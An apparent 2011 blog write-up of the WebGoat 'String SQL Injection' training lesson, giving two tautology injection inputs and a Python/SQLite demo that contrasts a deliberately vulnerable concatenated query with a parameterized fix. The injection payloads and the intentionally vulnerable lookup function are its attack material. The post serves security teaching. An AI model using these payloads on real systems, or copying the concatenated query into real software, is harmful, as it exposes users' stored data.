Monday, August 22, 2011

WebGoat - String SQL Injection

Requirement:



Solution:

As we can see from the above picture, the SQL statement is

SELECT * FROM user_data WHERE last_name = 'Your Name'

where 'Your Name' comes from the user's input and there is no input validation on the client side at all. This is the SQL injection point.

Attacking process:

Submit the following malicious input to break the SQL logic:

Input: Smith' or 'a' = 'a            (note that there is no closing single quote at the end; the application's own quote closes the string)

Then the SQL statement will become:

SELECT * FROM user_data WHERE last_name = 'Smith' or 'a' = 'a'

Because 'a' = 'a' is always true, this makes the server return every row in the table.

pic-1 is normal request:



pic-2 is malicious request:



Alternatively, we can use a comment marker to neutralise the trailing single quote.

Attacking input: Smith' or 1=1 --   ("--" starts an SQL comment; anything that follows it is ignored)

Then the SQL statement will become:

SELECT * FROM user_data WHERE last_name = 'Smith' or 1=1 --'

This also returns all of the data.
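To see why both inputs work and what stops them, here is an added example (not WebGoat's own code, written in Python with an in-memory SQLite table instead of WebGoat's Java and HSQLDB) that runs the lesson's query two ways: with the input concatenated into the SQL string as the lesson does, and with a bound parameter. The user_data rows are constructed for the demonstration.

```python
import sqlite3

# Constructed sample data standing in for the lesson's user_data table.
ROWS = [
    (101, "Joe", "Snow"),
    (102, "John", "Smith"),
    (103, "Jane", "Plane"),
    (104, "Jolly", "Hershey"),
]


def make_db():
    """Create an in-memory table shaped like the lesson's user_data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_data (userid INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO user_data VALUES (?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, last_name):
    """The lesson's pattern: user input is pasted straight into the SQL text,
    so a quote in the input changes the statement's structure."""
    sql = "SELECT * FROM user_data WHERE last_name = '" + last_name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, last_name):
    """The fix: a bound parameter, so the whole input is compared as one value
    and quotes or '--' inside it never reach the SQL parser as syntax."""
    sql = "SELECT * FROM user_data WHERE last_name = ?"
    return conn.execute(sql, (last_name,)).fetchall()


def compare(last_name):
    """Return (rows from the concatenated query, rows from the parameterized query)."""
    conn = make_db()
    try:
        return lookup_vulnerable(conn, last_name), lookup_parameterized(conn, last_name)
    finally:
        conn.close()


if __name__ == "__main__":
    for payload in ["Smith", "Smith' or 'a' = 'a", "Smith' or 1=1 --"]:
        vuln, safe = compare(payload)
        print(f"{payload!r}: concatenated -> {len(vuln)} rows, parameterized -> {len(safe)} rows")
```

With the legitimate input both queries return John Smith's single row; with either injected input the concatenated query returns all four rows while the parameterized query returns none, because no last_name literally equals the injected text.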



